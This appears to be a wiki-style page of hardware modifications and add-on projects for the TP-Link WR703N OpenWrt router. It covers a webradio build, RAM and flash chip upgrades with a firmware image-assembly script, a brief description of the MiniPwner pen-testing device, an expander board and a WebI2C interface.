This project implements a webradio with cheep usb soundcard and a speaker of an old mobile phone within the casing of the router. There are two analogue controllers for selecting the stream and the volume. Therefor an attiny85 is connected to the uart.

Building a tiny webradio with analog volume and tune controller

64MB RAM Mod

The Device uses a DDR1 16Mbit x 16bit (16Mibit*16=256 mebibit. 256 mebibit/8=32MiByte) 400MHz chip Zentel A3S56D40FTP. Replace it with any 32Mbit x 16bit chip. 333MHz instead of 400MHz also works fine. It's quite hard to find these chips. One of the ways to get them is to have a look at DDR SO-DIMM (because SO-DIMM modules are shipped with x16 chips). Since there are no 64Mbit x 16bit DDR1 Chips available → no 128 MB mod!

The most easy approach is to seek for a 4-chip DDR 256 MB module. These all have x16 chips too. Chips only on one side (not to be confused with double-sided 256 MB modules with 4 chips on each side) and only 4 of them - that's the best chance to get some. They represent a small percent among usual 8-chip modules but this is equalized with the amount and "cheap as dirt" price of such DDR 256 MB modules.

Chip can also be salvaged from dead HDD with 64Mb cache, for example 2Tb Western Digital WD2002FYPS

Working chips:

Additional list that may work:

Type ID Code Vendor
DDR 32Mx16 DDR 400 TSOP Pb Free HY5DU121622DTP-D43-C Hynix
DDR 32Mx16 DDR 400 TSOP Pb Free H5DU5162ETR-E3C Hynix
DDR 32Mx16 DDR 400 Pb Free K4H511638J-LCCC Samsung
DDR 32Mx16 DDR 400 A3S12D40ETP-G5 Zentel
DDR 32Mx16 DDR 400 NT5DS32M16BS-5T Nanya
DDR 32Mx16 DDR 400 PB Free P3S12D40ETP-GUTT Mira
DDR 32Mx16 DDR 333 CL2.5 TSOP MT46V32M16TG-6T:F Micron
DDR 32Mx16 DDR 333 CL2.5 TSOP MT46V32M16P-6T:F Micron
DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160CE-6 Qimonda
DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160CEL-6 Qimonda
DDR 32Mx16 DDR 333 PB Free TSOP HYB25D512160DE-6 Qimonda

By default router is able to see all 64MB.

root@OpenWrt:~# free
             total         used         free       shared      buffers
Mem:         61864        48044        13820            0        30316

16MB Flash Mod

Remarks

Create a working image

In order to replace the 4mb flash chip with a 16mb one you may at first dump two important partitions:

After dumping the memory , use dd to extract the second and last block.

#!/bin/sh
# new image size
# block size -> 64k
bs=65536
ls -l flash_dump
# -rw-rw-r-- 1 makefu makefu 4194304 Mar 21 10:28 flash_dump
flash_size=$(ls -l flash_dump | cut -d\  -f 5)
#             4194304 / 65536
num_blocks=$(($flash_size/$bs))
# 64 blocks, 64kilobyte each
dd if=flash_dump of=data.bin bs=$bs count=1 skip=1
dd if=flash_dump of=art.bin bs=$bs count=1 skip=$(($num_blocks-1))

After that you can cat together your new image:

new_image_size=16777216
truncate --size $((new_image_size-3*$bs)) whitespace.bin

# build pepe2k bootloader at first: see https://github.com/pepe2k/u-boot_mod
cat uboot_for_tp-link_tl-wr703n.bin \
    data.bin \
    whitespace.bin \
    art.bin > wr703_bootloader_data_whitespace_art.bin
Flash this image with your SPI-programmer on your new chip and solder it in. You can now hold the button for 3 seconds (will blink each second) and release to make the bootloader start a httpd at 192.168.1.1.

MiniPwner Home

The MiniPwner's key features include:

Integrated Wired and Wireless connections Once plugged into a target network, the Mini-Pwner can establish an SSH tunnel through the target network, or can be accessed by wifi. In addition, the MiniPwner can be configured as a wifi sniffer and logger - wardriving in your pocket.

Low power consumption, can be run off battery. With the 1700 mAh battery included in the kit, the Mini-Pwner will run for over five hours of active wired and wireless activity. No need to find a power outlet during the pen test.

Multiple Pen Testing Tools included tcpdump, nmap, kismet, all come pre-installed

Flexible and Expandable The MiniPwner runs on the open source OpenWrt operating system. You can easily add or change the installed packages.

Small size The MiniPwner can be easily carried in a pocket, hidden behind a telephone, or hang from a jack by a short ethernet cable.

There are many other creative ways to use the MiniPwner. Here is a list of some of the software that comes installed:

Web - http://www.minipwner.com/

WR703N Expander board and case

Kean Electronics in conjunction with the Sydney Hackerspace has developed WR703N Expander board as Open Hardware, all schematics are available online on their website - http://www.kean.com.au/oshw/WR703N/

Connector Info

WebI2C: I2C,SPI,1-Wire

I2CCHIP has put a hardware serial bus interface inside. Fully built up, this will work immediately out of the box, and any configuration can be done completely from the browser.

WebI2C

Ascii commands control I2C, SPI, and 1-Wire buses using BL233 chip.

Firmware supports autonomous data collection to the internal webserver, serial-over-network control, remote-over-internet access, webcam snapshots from internet. Webpage allows editing of the I2C commands, logging shell scripts, javascript display functions etc. The webpage lets you convert the I2C raw data, to readable values with some simple javascript.

Why would you do I2C this way, instead of a software bit bash the i/o pins?

Tags